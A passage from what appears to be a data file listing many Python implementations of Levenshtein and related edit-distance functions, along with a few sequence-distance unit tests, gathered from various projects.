[0] * len(seq2) + [x + 1])\n for y in range(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x - 1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def dameraulevenshtein(self, seq1, seq2):\n # codesnippet:D0DE4716-B6E6-4161-9219-2903BF8F547F\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = range(1, len(seq2) + 1) + [0]\n for x in xrange(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. 
This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = oneago, thisrow, [0] * len(seq2) + [x + 1]\n for y in xrange(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x-1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def edit_distance(s1, s2, transpositions=False):\r\n # set up a 2-D array\r\n len1 = len(s1)\r\n len2 = len(s2)\r\n lev = _edit_dist_init(len1 + 1, len2 + 1)\r\n\r\n # iterate over the array\r\n for i in range(len1):\r\n for j in range(len2):\r\n _edit_dist_step(lev, i + 1, j + 1, s1, s2, transpositions=transpositions)\r\n return lev[len1][len2]", "def _pairwise_dist(self,seq1,seq2):\n \n return jf.damerau_levenshtein_distance(str(seq1), str(seq2))", "def minimum_edit_distance(seq1,seq2):\n if len(seq1) > len(seq2):\n seq1,seq2 = seq2,seq1\n distances = range(len(seq1) + 1)\n for index2,char2 in enumerate(seq2):\n newDistances = [index2+1]\n for index1,char1 in enumerate(seq1):\n if char1 == char2:\n newDistances.append(distances[index1])\n else:\n newDistances.append(1 + min((distances[index1],\n distances[index1+1],\n newDistances[-1])))\n distances = newDistances\n return distances[-1]", "def get_levenshtein_distance(a, b):\r\n n, m = len(a), len(b)\r\n if n > m:\r\n # Make sure n <= m, to use O(min(n,m)) space\r\n a, b = b, a\r\n n, m = m, n\r\n current_row = range(n+1) # Keep current and previous row, not entire matrix\r\n\r\n for i in range(1, m+1):\r\n previous_row, current_row = current_row, [i]+[0]*n\r\n for j in range(1, n+1):\r\n add, delete, change = previous_row[j]+1, current_row[j-1]+1, previous_row[j-1]\r\n if a[j-1] != b[i-1]:\r\n change += 1\r\n current_row[j] = min(add, delete, change)\r\n return current_row[n]", "def word_embedding_levenshtein(seq1, seq2, embeddings, average_distance, r=0.9, normalise=False):\n\tx1 = 1 + len(seq1)\n\tx2 = 1 + len(seq2)\n\n\talpha = r / ((1 - r) * average_distance)\n\n\t# Initialisation of the matrix\n\td = [] # Using Numpy structures for this is probably not more efficient\n\td.append(list(range(x2)))\n\tfor i in range(1, x1):\n\t\td.append([i] * x2)\n\n\t# Core of the algorithm\n\tfor i in range(1, x1):\n\t\tfor j in range(1, x2):\n\t\t\te1 = seq1[i-1]\n\t\t\te2 = seq2[j-1]\n\n\t\t\tif(e1 == e2): c = 0\n\t\t\telse:\n\t\t\t\tv1 = embeddings[e1]\n\t\t\t\tv2 = embeddings[e2]\n\n\t\t\t\tif((v1 is None) or (v2 is None)): c = 1\n\t\t\t\telse:\n\t\t\t\t\tdst = np.linalg.norm(v1 - v2) # Distance 2 (or L2 norm of the difference)\n\n\t\t\t\t\t# Now, we need a function increasing function mapping 0 to 0 and +inf to 1\n\t\t\t\t\tc = 1 - (1 / (1 + (alpha * dst)))\n\n\t\t\t\t\t#c /= r # If you uncomment this line, the cost of a substitution at distance `average_distance` will be 1 and substitutions might have higher cost, up to 1/r. 
This might be justified as long as `r` is above 0.5 (otherwise, some substitutions might be more expensive than an insertion followed by a deletion).\n\n\t\t\td[i][j] = min(\n\t\t\t\t(d[(i-1)][j] + 1), # Deletion of seq1[i]\n\t\t\t\t(d[i][(j-1)] + 1), # Insertion of seq2[j]\n\t\t\t\t(d[(i-1)][(j-1)] + c) # Substitution from seq1[i] to seq2[j]\n\t\t\t)\n\n\traw = d[-1][-1]\n\n\tif(normalise): return (raw / (len(seq1) + len(seq2)))\n\treturn raw",
 "def levenshtein_distance(s1,s2):\n\n\t\tif len(s1) < len(s2):\n\t\t\treturn Searcher.levenshtein_distance(s2, s1)\n\n\t\t# len(s1) >= len(s2)\n\t\tif len(s2) == 0:\n\t\t\treturn len(s1)\n\n\t\tprevious_row = range(len(s2) + 1)\n\t\tfor i, c1 in enumerate(s1):\n\t\t\tcurrent_row = [i + 1]\n\t\t\tfor j, c2 in enumerate(s2):\n\t\t\t\tinsertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer\n\t\t\t\tdeletions = current_row[j] + 1 # than s2\n\t\t\t\tsubstitutions = previous_row[j] + (c1 != c2)\n\t\t\t\tcurrent_row.append(min(insertions, deletions, substitutions))\n\t\t\tprevious_row = current_row\n\t\t\n\t\treturn previous_row[-1]",
 "def levenshtein(s1, s2):\n if len(s1) < len(s2):\n return levenshtein(s2, s1)\n\n # len(s1) >= len(s2)\n if len(s2) == 0:\n return len(s1)\n\n previous_row = range(len(s2) + 1)\n for i, c1 in enumerate(s1):\n current_row = [i + 1]\n for j, c2 in enumerate(s2):\n insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer\n deletions = current_row[j] + 1 # than s2\n substitutions = previous_row[j] + (c1 != c2)\n current_row.append(min(insertions, deletions, substitutions))\n previous_row = current_row\n \n return previous_row[-1]",
 "def compute_backpointers(s0, s1): # Builds an array of backpointers\r\n if s0 == None or s1 == None:\r\n raise Exception('Both s0 and s1 have to be set')\r\n rows = len(s0)+1 # number of rows\r\n columns = len(s1)+1 # number of columns\r\n\r\n ####### Build the Levenshtein matrix ########\r\n # Create an empty matrix of zeros\r\n distance = [[0 for y in range(len(s1)+1)] for x in range(len(s0)+1)]\r\n\r\n # Set the outer layers of the matrix 0 -> len(str) vertically and horizontally\r\n for i in range(1,rows):\r\n distance[i][0] = i\r\n for i in range(1,columns):\r\n distance[0][i] = i\r\n\r\n # Compute the cost of every position inside the matrix and insert it:\r\n # check whether the letter at this index is the same in both words, in which case it costs 0\r\n # and takes the same value as the diagonal predecessor; otherwise it costs 1 from above or below.\r\n for column in range(1,columns):\r\n for row in range(1,rows): # check every row in each column\r\n if s0[row-1] == s1[column -1]: # the same letter costs 0\r\n c = 0\r\n else: # otherwise it costs 2\r\n c = 2\r\n distance[row][column] = min(distance[row-1][column] + 1,distance[row][column-1] + 1,distance[row-1][column-1] + c)\r\n # the line above says that the smallest of the value above or beside + 1, or the diagonal predecessor plus (0 or 2),\r\n # is inserted at this position in the matrix.\r\n\r\n # the minimum distance is\r\n cost = distance[row][column]\r\n print(\"the total cost is\")\r\n print(cost)\r\n\r\n\r\n ####### Build the backptr matrix ########\r\n # Create an empty matrix filled with [0,0] for the backptr matrix\r\n backptr = [[[0, 0] for y in range(len(s1)+1)] for x in range(len(s0)+1)]\r\n\r\n # walk through the positions in the Levenshtein matrix backwards\r\n for column in range(columns-1,0,-1):\r\n for row in range(rows-1,0,-1):\r\n # If the value to the left is the smallest: point left\r\n if distance[row][column-1] == min(distance[row-1][column-1],distance[row][column-1],distance[row-1][column]):\r\n backptr[row][column][0] = row\r\n backptr[row][column][1] = column -1\r\n # If the value above is the smallest: point up\r\n if distance[row-1][column] == min(distance[row-1][column-1],distance[row][column-1],distance[row-1][column]):\r\n backptr[row][column][0] = row -1\r\n backptr[row][column][1] = column\r\n # if the diagonal value is the smallest: point to the diagonal\r\n if distance[row-1][column-1] == min(distance[row-1][column-1],distance[row][column-1],distance[row-1][column]):\r\n backptr[row][column][0] = row-1\r\n backptr[row][column][1] = column -1\r\n\r\n # Set the outer values of the matrix (NOTE: not actually needed)\r\n for i in range(0,rows):\r\n j = i-1\r\n backptr[i][0][0] = j\r\n backptr[i][0][1] = 0\r\n for i in range(0,columns):\r\n j = i-1\r\n backptr[0][i][1] = j\r\n backptr[0][i][0] = 0\r\n\r\n return backptr",
 "def levenshtein_distance(first, second):\n if len(first) > len(second):\n first, second = second, first\n if len(second) == 0:\n return len(first)\n first_length = len(first) + 1\n second_length = len(second) + 1\n distance_matrix = [range(second_length) for x in range(first_length)]\n for i in range(1, first_length):\n for j in range(1, second_length):\n deletion = distance_matrix[i-1][j] + 1\n insertion = distance_matrix[i][j-1] + 1\n substitution = distance_matrix[i-1][j-1]\n if first[i-1] != second[j-1]:\n substitution += 1\n distance_matrix[i][j] = min(insertion, deletion, substitution)\n\n return distance_matrix[first_length-1][second_length-1]",
 "def find_edit_distance(string1,string2):\n M=zeros((len(string1)+1,len(string2)+1), dtype=int)\n for i in xrange(1,len(string1)+1):\n M[i][0]=i\n for j in xrange(1,len(string2)+1):\n M[0][j]=j\n for i in xrange(1,len(string1)+1):\n for j in xrange(1,len(string2)+1):\n if(string1[i-1]!=string2[j-1]):\n M[i][j] = min(M[i - 1][j] + 1, M[i][j - 1] + 1, M[i - 1][j - 1] + 1)\n else:\n M[i][j] = M[i - 1][j - 1]\n return M[len(string1)][len(string2)]",
 "def iterative_levenshtein(self, w1, d1, w2, d2):\n rows = len(w1) + 1\n cols = len(w2) + 1\n dist = [[0 for x in range(cols)] for x in range(rows)]\n # source prefixes can be transformed into empty strings\n # by deletions:\n for i in range(1, rows):\n dist[i][0] = i\n # target prefixes can be created from an empty source string\n # by inserting the characters\n for i in range(1, cols):\n dist[0][i] = i\n\n for col in range(1, cols):\n for row in range(1, rows):\n if w1[row - 1] == w2[col - 1]:\n cost = 0\n else:\n cost = 1\n dist[row][col] = min(dist[row - 1][col] + 1, # deletion\n dist[row][col - 1] + 1, # insertion\n dist[row - 1][col - 1] + cost) # substitution\n return dist[row][col] < 5",
 "def levenshtein(seq1: str, seq2: str) -> int:\n if seq1 == \"\":\n return len(seq2)\n if seq2 == \"\":\n return len(seq1)\n if seq1[-1] == seq2[-1]:\n cost = 0\n else:\n cost = 1\n \n result = min([levenshtein(seq1[:-1], seq2) + 1,\n levenshtein(seq1, seq2[:-1]) + 1,\n levenshtein(seq1[:-1], seq2[:-1]) + cost ])\n return result",
 "def levenshtein_similarity(self, top, rows):\n if len(rows) > 1:\n return (\n [(1 - editdistance.eval(top, rows[i]) / max(len(top), len(rows[i]))) for i in\n range(0, len(rows))])\n else:\n return 1",
 "def damerau_levenshtein_distance(comp_sec):\n s1 = comp_sec['log_trace']\n s2 = comp_sec['sim_trace']\n p1 = comp_sec['proc_log_trace']\n p2 = comp_sec['proc_sim_trace']\n w1 =
comp_sec['wait_log_trace']\n w2 = comp_sec['wait_sim_trace']\n d = {}\n lenstr1 = len(s1)\n lenstr2 = len(s2)\n for i in range(-1,lenstr1+1):\n d[(i,-1)] = i+1\n for j in range(-1,lenstr2+1):\n d[(-1,j)] = j+1\n for i in range(0, lenstr1):\n for j in range(0, lenstr2):\n if s1[i] == s2[j]:\n t1 = p1[i] + w1[i]\n if t1 > 0:\n b1 = (p1[i]/t1)\n b2 = (w1[i]/t1)\n cost = (b1*abs(p2[j]-p1[i])) + (b2*abs(w2[j]-w1[i]))\n else:\n cost = 0\n else:\n cost = 1\n d[(i,j)] = min(\n d[(i-1,j)] + 1, # deletion\n d[(i,j-1)] + 1, # insertion\n d[(i-1,j-1)] + cost, # substitution\n )\n if i and j and s1[i]==s2[j-1] and s1[i-1] == s2[j]:\n d[(i,j)] = min (d[(i,j)], d[i-2,j-2] + cost) # transposition\n return d[lenstr1-1,lenstr2-1]", "def edit_distance(left, right):\n similarities = np.zeros((len(left) + 1, len(right) + 1), dtype=np.int32)\n similarities[:, 0] = range(len(left) + 1)\n similarities[0, :] = range(len(right) + 1)\n\n for l in range(1, len(left) + 1):\n for r in range(1, len(right) + 1):\n sub_cost = 0 if left[l - 1] == right[r - 1] else 1\n similarities[l][r] = min(similarities[l - 1][r] + 1,\n similarities[l][r - 1] + 1,\n similarities[l - 1][r - 1] + sub_cost)\n return similarities[len(left), len(right)]", "def distance_matrix(sequences, substitution_mat):\n distance_mat = numpy.empty((len(sequences), len(sequences)), dtype='float')\n\n print(\"Building distance matrix\")\n # Get similarity score\n for i, seqA in enumerate(sequences):\n sys.stdout.write(\"\\r%.f%%\" % (float(i+1)/len(sequences)*100))\n sys.stdout.flush()\n for j, seqB in enumerate(sequences[i:], start=i):\n score = substitution_score(substitution_mat, seqA, seqB)\n distance_mat[i, j] = score\n distance_mat[j, i] = score\n print(\"\")\n # Set equal the diagonal\n diag_mini = numpy.min(distance_mat.diagonal())\n for i in range(len(sequences)):\n distance_mat[i, i] = diag_mini\n # Convert similarity score into a distance\n mini = numpy.min(distance_mat)\n maxi = numpy.max(distance_mat)\n return 1 - (distance_mat + abs(mini))/(maxi - mini)", "def nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix=tcr_nb_distance_matrix, dist_weight=3, gap_penalty=4, ntrim=3, ctrim=2, fixed_gappos=True):\n\n return _nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix, dist_weight, gap_penalty, ntrim, ctrim, fixed_gappos)", "def _levenshtein_distance(t1: Trace, t2: Trace):\n if t1.length > t2.length:\n t1, t2 = t2, t1\n\n distances = range(t1.length + 1)\n for i2, c2 in enumerate(t2.event_list):\n distances_ = [i2 + 1]\n for i1, c1 in enumerate(t1.event_list):\n if c1 == c2:\n distances_.append(distances[i1])\n else:\n distances_.append(1 + min((distances[i1], distances[i1 + 1], distances_[-1])))\n distances = distances_\n return distances[-1]", "def leveinshtein_distance(source,target):\r\n\t#Step 1\r\n\ts_len=len(source)\r\n\tt_len=len(target)\r\n\tcost=0\r\n\tif(s_len==0):\r\n\t\treturn t_len\r\n\tif(t_len==0):\r\n\t\treturn s_len\r\n\tprint(\"Dimensions:\\n\\tN:%d\\n\\tM:%d\"%(s_len,t_len))\r\n\t#Step 2\r\n\tmatrix=[[0 for _ in range(0,t_len+1)] for _ in range(0, s_len+1)]\r\n\t#Initialize first row 0..s_len\r\n\tfor idx in range(0,s_len+1):\r\n\t\tmatrix[idx][0]=idx\r\n\t#Initialize the first column 0..t_len\r\n\tfor idx in range(0, t_len+1):\r\n\t\tmatrix[0][idx]=idx\r\n\tprint(\"===Original===\")\r\n\tprint_matrix(matrix,source,target)\r\n\t#Step 3\r\n\tfor i in range(1,s_len+1):\r\n\t\tch=source[i-1]\r\n\t\t#print(ch)\r\n\t\t#Step 4\r\n\t\tfor j in range(1,t_len+1):\r\n\t\t\t#print(\">%s\"%target[j-1])\r\n\t\t\t#Step 
5\r\n\t\t\tif ch==target[j-1]:\r\n\t\t\t\tcost=0\r\n\t\t\telse:\r\n\t\t\t\tcost=1\r\n\t\t\t#Step 6\r\n\t\t\t\r\n\t\t\t#print(\"(i,j)=>(%d,%d)\"%(i,j))\r\n\t\t\t#print(matrix[i][j])\r\n\t\t\tmatrix[i][j]=minimum(\r\n\t\t\t\tmatrix[i-1][j]+1,\r\n\t\t\t\tmatrix[i][j-1]+1,\r\n\t\t\t\tmatrix[i-1][j-1]+cost\r\n\t\t\t)\r\n\tprint(\"===Final Matrix===\")\r\n\tprint_matrix(matrix,source,target)\r\n\treturn matrix[s_len-1][t_len-1]", "def damerau_levenshtein_distance(s1, s2):\n\n utils.check_for_none(s1, s2)\n utils.check_for_type(str, s1, s2)\n\n # s1 = utils.unicode_normalize(s1)\n # s2 = utils.unicode_normalize(s2)\n\n n1, n2 = len(s1), len(s2)\n infinite = n1 + n2\n\n char_arr = defaultdict(int)\n dp = [[0] * (n2 + 2) for _ in range(n1 + 2)]\n\n dp[0][0] = infinite\n for i in range(0, n1 + 1):\n dp[i + 1][0] = infinite\n dp[i + 1][1] = i\n for i in range(0, n2 + 1):\n dp[0][i + 1] = infinite\n dp[1][i + 1] = i\n\n for i in range(1, n1 + 1):\n db = 0\n for j in range(1, n2 + 1):\n i1 = char_arr[s2[j - 1]]\n j1 = db\n cost = 1\n if s1[i - 1] == s2[j - 1]:\n cost = 0\n db = j\n\n dp[i + 1][j + 1] = min(dp[i][j] + cost,\n dp[i + 1][j] + 1,\n dp[i][j + 1] + 1,\n dp[i1][j1] + (i - i1 - 1) + 1 + (j - j1 - 1))\n char_arr[s1[i - 1]] = i\n\n return dp[n1 + 1][n2 + 1]", "def edit_distance(s1: str, s2: str) -> int:\n # dp[a][b] is the edit distance between s1[:a] and s2[:b]\n dp = [[0 for _ in range(len(s2) + 1)] for _ in range(len(s1) + 1)]\n\n for i in range(len(s1) + 1):\n for j in range(len(s2) + 1):\n dp[i][j] = 0\n\n for i in range(len(s1) + 1):\n for j in range(len(s2) + 1):\n # The two base cases: the empty string compared to another string\n # alway has the edit distance of the length of the other string,\n # because you just insert all of the characters from the other\n # string\n if i == 0:\n dp[i][j] = j\n elif j == 0:\n dp[i][j] = i\n # If the characters are equal, we don't add anything to the edit\n # distance\n elif s1[i - 1] == s2[j - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n # We have 3 cases when the characters aren't equal: we have an\n # insertion, a deletion, or a substitution.\n else:\n dp[i][j] = min(dp[i - 1][j], dp[i][j - 1],\n dp[i - 1][j - 1]) + 1\n print(dp)\n return dp[-1][-1]", "def string_edit_dist(str1, str2):\n sm = edit_distance.SequenceMatcher(a=str1, b=str2)\n return sm.distance()", "def weighted_levenshtein(seq1, seq2, weights, r=0.9, normalise=False):\n\tx1 = 1 + len(seq1)\n\tx2 = 1 + len(seq2)\n\n\talpha = r / ((1 - r) * average_distance)\n\n\t# Initialisation of the matrix\n\td = [] # Using Numpy structures for this is probably not more efficient\n\ttmp = 0.0\n\tfirst_line = [tmp]\n\tfor e in seq2:\n\t\ttmp += weights.get(e, 1)\n\t\tfirst_line.append(tmp)\n\td.append(first_line)\n\ttmp = 0\n\tfor e in seq1:\n\t\ttmp += weights.get(e, 1)\n\t\td.append([tmp] * x2)\n\n\t# Core of the algorithm\n\tfor i in range(1, x1):\n\t\tfor j in range(1, x2):\n\t\t\te1 = seq1[i-1]\n\t\t\te2 = seq2[j-1]\n\n\t\t\tw1 = weights.get(e1, 1)\n\t\t\tw2 = weights.get(e2, 1)\n\n\t\t\td[i][j] = min(\n\t\t\t\t(d[(i-1)][j] + w1), # Deletion of seq1[i]\n\t\t\t\t(d[i][(j-1)] + w2), # Insertion of seq2[j]\n\t\t\t\t(d[(i-1)][(j-1)] + (int(e1 != e2) * max(w1, w2))) # Substitution from seq1[i] to seq2[j]\n\t\t\t)\n\n\traw = d[-1][-1]\n\n\tif(normalise): return (raw / (d[0][-1] + d[-1][0]))\n\treturn raw", "def question7(seq_x, seq_y):\n \n diag_score = 2\n off_diag_score = 1\n dash_score = 0\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n score_matrix = student.build_scoring_matrix(alphabet, diag_score, 
off_diag_score, dash_score)\n \n align_matrix = student.compute_alignment_matrix(seq_x, seq_y, score_matrix, True)\n score, align_x, align_y = student.compute_global_alignment(seq_x, seq_y, score_matrix, align_matrix)\n \n edit_distance = len(seq_x) + len(seq_y) - score\n \n print \"Edit distance: \" + str(edit_distance)\n print align_x\n print align_y", "def edit_distance_dp(str_1, m, str_2, n):\n # table for storing sub-problems\n sub = [[0 for i in range(n + 1)] for j in range(m + 1)] # padded for empty cases\n\n # fill table\n for i in range(m + 1):\n for j in range(n + 1):\n if i == 0:\n # str_1 is empty, or we have not selected any substring of it\n sub[i][j] = j # the difference is all of str_2, equivalent to len(str_2) = j removals\n elif j == 0:\n # str_2 is empty, or we have not selected any substring of it\n sub[i][j] = i # the difference is all of str_1, equivalent to len(str_1_ = i removals\n elif str_1[i - 1] == str_2[j - 1]:\n # last chars are equal, so no edits needed; continue for sub-problems\n sub[i][j] = sub[i - 1][j - 1]\n else:\n # last chars are not equal, solve for all 3 subproblems\n insert_char = sub[i][j - 1]\n remove_char = sub[i - 1][j]\n replace_char = sub[i - 1][j - 1]\n sub[i][j] = 1 + min(insert_char, remove_char, replace_char)\n\n return sub[m][n] # solution lies in last cell", "def __levenshtein(a, b):\n\n n, m = len(a), len(b)\n if n > m:\n # Make sure n <= m, to use O(min(n,m)) space\n a, b = b, a\n n, m = m, n\n\n current = list(range(n + 1))\n for i in range(1, m + 1):\n previous, current = current, [i] + [0] * n\n for j in range(1, n + 1):\n add, delete = previous[j] + 1, current[j - 1] + 1\n change = previous[j - 1]\n if a[j - 1] != b[i - 1]:\n change = change + 1\n current[j] = min(add, delete, change)\n\n return current[n]", "def levenshtein_distance(s: Union[bytes, str], t: Union[bytes, str]) -> int:\n if s is None or t is None:\n raise ValueError(\"Strings must not be None\")\n\n n = len(s)\n m = len(t)\n\n if n == 0:\n return m\n elif m == 0:\n return n\n\n if n > m:\n tmp = s\n s = t\n t = tmp\n n = m\n m = len(t)\n\n p = [0] * (n + 1)\n d = [0] * (n + 1)\n\n for i in range(0, n + 1):\n p[i] = i\n\n for j in range(1, m + 1):\n if DEBUG_DISTANCE:\n if j % 100 == 0:\n print(\"DEBUG:\", int(j / (m + 1.0) * 100), \"%\\r\", end=' ', file=sys.stderr)\n t_j = t[j - 1]\n d[0] = j\n\n for i in range(1, n + 1):\n cost = 0 if s[i - 1] == t_j else 1\n # minimum of cell to the left+1, to the top+1, diagonally left and up +cost\n d[i] = min(min(d[i - 1] + 1, p[i] + 1), p[i - 1] + cost)\n\n _d = p\n p = d\n d = _d\n\n if DEBUG_DISTANCE:\n print(\"\\n\", file=sys.stderr)\n return p[n]", "def levenshtein(source, target):\n if len(source) < len(target):\n return levenshtein(target, source)\n\n # So now we have len(source) >= len(target).\n if len(target) == 0:\n return len(source)\n\n # We call tuple() to force strings to be used as sequences\n # ('c', 'a', 't', 's') - numpy uses them as values by default.\n source = np.array(tuple(source))\n target = np.array(tuple(target))\n\n # We use a dynamic programming algorithm, but with the\n # added optimization that we only need the last two rows\n # of the matrix.\n previous_row = np.arange(target.size + 1)\n for s in source:\n # Insertion (target grows longer than source):\n current_row = previous_row + 1\n\n # Substitution or matching:\n # Target and source items are aligned, and either\n # are different (cost of 1), or are the same (cost of 0).\n current_row[1:] = np.minimum(\n current_row[1:],\n 
np.add(previous_row[:-1], target != s))\n\n # Deletion (target grows shorter than source):\n current_row[1:] = np.minimum(\n current_row[1:],\n current_row[0:-1] + 1)\n\n previous_row = current_row\n\n return previous_row[-1]", "def test_matrix_distance(self):\n # note that the score matrix must contain 'diagonal' elements m[i][i]\n # to avoid failure when the sequences match.\n m = {\"U\": {\"U\": 0, \"C\": 1, \"A\": 5}, \"C\": {\"C\": 0, \"A\": 2, \"G\": 4}}\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"UCACGG\", m), 14)\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"\", m), 0)\n self.assertEqual(self.RNA(\"UUU\").matrix_distance(\"CAC\", m), 7)\n self.assertRaises(KeyError, self.RNA(\"UUU\").matrix_distance, \"CAG\", m)", "def _edit_distance(prediction_tokens: List[str], reference_tokens: List[str]) ->int:\n dp = [([0] * (len(reference_tokens) + 1)) for _ in range(len(prediction_tokens) + 1)]\n for i in range(len(prediction_tokens) + 1):\n dp[i][0] = i\n for j in range(len(reference_tokens) + 1):\n dp[0][j] = j\n for i in range(1, len(prediction_tokens) + 1):\n for j in range(1, len(reference_tokens) + 1):\n if prediction_tokens[i - 1] == reference_tokens[j - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n else:\n dp[i][j] = min(dp[i - 1][j], dp[i][j - 1], dp[i - 1][j - 1]) + 1\n return dp[-1][-1]", "def levenshtein_dist(s1, s2, dele, add, sub):\n m = np.zeros((len(s1)+1, len(s2)+1), dtype=np.int)\n p = np.zeros((len(s1)+1, len(s2)+1), dtype=np.float)\n for i in range(len(s1)+1):\n m[i, 0] = i\n # compute probability for deletion\n if i == 0:\n p[i, 0] = 1\n else:\n ind = alphabet.index('@')\n p[i, 0] = p[i-1, 0] * dele[ind, alphabet.index(s1[i-1])]\n for j in range(len(s2)+1):\n # compute probability for insertion\n if j == 0:\n p[0, j] = 1\n else:\n prev_char = '@' if j == 1 else s2[j-2]\n p[0, j] = p[0, j-1] * add[alphabet.index(prev_char),\n alphabet.index(s2[j-1])]\n m[0, j] = j\n for i in range(1, 1+len(s1)):\n for j in range(1, len(s2)+1):\n if s1[i-1] == s2[j-1]:\n k = np.argmin([m[i-1, j] + 1, m[i, j-1] + 1, m[i-1, j-1]])\n if k == 0:\n # deletion\n m[i, j] = m[i-1, j] + 1\n prev_char = '@' if j == 1 else s2[j-2]\n p[i, j] = p[i-1, j] * dele[alphabet.index(prev_char), alphabet.index(s1[i-1])]\n elif k == 1:\n # insertion\n m[i, j] = m[i, j-1] + 1\n prev_char = '@' if j == 1 else s2[j-2]\n p[i, j] = p[i, j-1] * add[alphabet.index(prev_char), alphabet.index(s2[j-1])]\n else:\n # no mistake\n m[i, j] = m[i-1, j-1]\n p[i, j] = p[i-1, j-1]\n else:\n k = np.argmin([m[i-1, j] + 1, m[i, j-1] + 1, m[i-1, j-1] + 1])\n if k == 0:\n # deletion\n m[i, j] = m[i-1, j] + 1\n prev_char = '@' if j == 1 else s2[j-2]\n p[i, j] = p[i-1, j] * dele[alphabet.index(prev_char), alphabet.index(s1[i-1])]\n elif k == 1:\n # insertion\n m[i, j] = m[i, j-1] + 1\n prev_char = '@' if j == 1 else s2[j-2]\n p[i, j] = p[i, j-1] * add[alphabet.index(prev_char), alphabet.index(s2[j-1])]\n else:\n # substitution\n m[i, j] = m[i-1, j-1] + 1\n p[i, j] = p[i-1, j-1] * sub[alphabet.index(s1[i-1]), alphabet.index(s2[j-1])]\n # recall that in sub[X, Y], Y is the correct word\n\n return m[len(s1), len(s2)], p[len(s1), len(s2)]", "def test_distance_indices(self):\n s1 = self.RNA(\"AUGC\")\n s2 = self.RNA(\"AAGC\")\n\n def f(x, y):\n if x == 2 or y == 2:\n return 10\n return 0\n\n self.assertEqual(s1.distance(s2, f, use_indices=True), 20)", "def distances(a, b):\n # generating matrix\n matrix = [[(0, None) for x in range(len(b) + 1)] for y in range(len(a) + 1)]\n\n # base case\n for i in range(1, len(a) + 1):\n 
matrix[i][0] = (i, Operation.DELETED)\n for j in range(1, len(b) + 1):\n matrix[0][j] = (j, Operation.INSERTED)\n\n # fill in matrix with tuples (cost, operation)\n for i in range(1, len(a) + 1):\n for j in range(1, len(b) + 1):\n # edit distance algorithm\n # costs for deletion, insertion and substitution\n delete_cost = matrix[i - 1][j][0] + 1\n insert_cost = matrix[i][j - 1][0] + 1\n substitute_cost = matrix[i - 1][j - 1][0]\n if a[i - 1] != b[j - 1]:\n substitute_cost += 1\n\n # edit distance is min cost of deletion, insertion, substitution\n if delete_cost < insert_cost and delete_cost < substitute_cost:\n matrix[i][j] = (delete_cost, Operation.DELETED)\n elif insert_cost < substitute_cost:\n matrix[i][j] = (insert_cost, Operation.INSERTED)\n else:\n matrix[i][j] = (substitute_cost, Operation.SUBSTITUTED)\n\n return matrix", "def find_ld(s, t, c=(1, 1, 1)):\n\n # output string templates\n pos_str = \"Position: row={} col={}\"\n let_str = \"Letters: {} -> {}\"\n op_str = \"Operation: {}, Cost: {}\"\n cst_str = \" {} ({},{}) cost: {} value: {}\"\n\n # keep the shape of the matrix consistent. The algorithm is symmetric\n if len(s) < len(t):\n return find_ld(t, s)\n\n # null inputs\n if len(t) == 0:\n return len(s), []\n\n rows = len(s) + 1\n cols = len(t) + 1\n row = rows\n col = cols\n\n # get costs from input tuple\n d_cost, i_cost, s_cost = c\n\n # setup blank matrices to hold distances and operations\n dist = [[0 for x in range(cols)] for x in range(rows)]\n\n # setup delete costs\n for row in range(1, rows):\n dist[row][0] = row * d_cost\n\n # setup insert costs\n for col in range(1, cols):\n dist[0][col] = col * i_cost\n\n # print initial matrix\n if verbose == 2:\n print()\n print(\"Initial Matrix:\")\n print_matrix(s, t, dist)\n\n for col in range(1, cols):\n for row in range(1, rows):\n\n if verbose == 2:\n print(pos_str.format(str(row), str(col)))\n print(let_str.format(str(s[row - 1]), str(t[col - 1])))\n\n # determine costs\n del_cost = dist[row - 1][col] + d_cost\n if verbose == 2:\n print(cst_str.format(\"delete\", str(row - 1), str(col), str(d_cost), str(del_cost)))\n\n ins_cost = dist[row][col - 1] + i_cost\n if verbose == 2:\n print(cst_str.format(\"insert\", str(row), str(col - 1), str(i_cost), str(ins_cost)))\n\n # sub cost could be 0 if letters are the same\n if s[row - 1] == t[col - 1]:\n sub_cost = dist[row - 1][col - 1] + 0\n if verbose == 2:\n print(cst_str.format(\"substitute (no change)\", str(row - 1), str(col - 1), \"0\", str(sub_cost)))\n else:\n sub_cost = dist[row - 1][col - 1] + s_cost\n if verbose == 2:\n print(cst_str.format(\"substitute\", str(row - 1), str(col - 1), str(s_cost), str(sub_cost)))\n\n # determine least costly operation\n if del_cost == min(del_cost, ins_cost, sub_cost):\n dist[row][col] = del_cost\n if verbose == 2:\n print(op_str.format('delete', del_cost))\n\n elif ins_cost == min(del_cost, ins_cost, sub_cost):\n dist[row][col] = ins_cost\n if verbose == 2:\n print(op_str.format('insert', ins_cost))\n\n else:\n # sub_cost == min(del_cost, ins_cost, sub_cost):\n dist[row][col] = sub_cost\n if verbose == 2:\n print(op_str.format('substitute', sub_cost))\n\n # print matrix every iteration is verbose 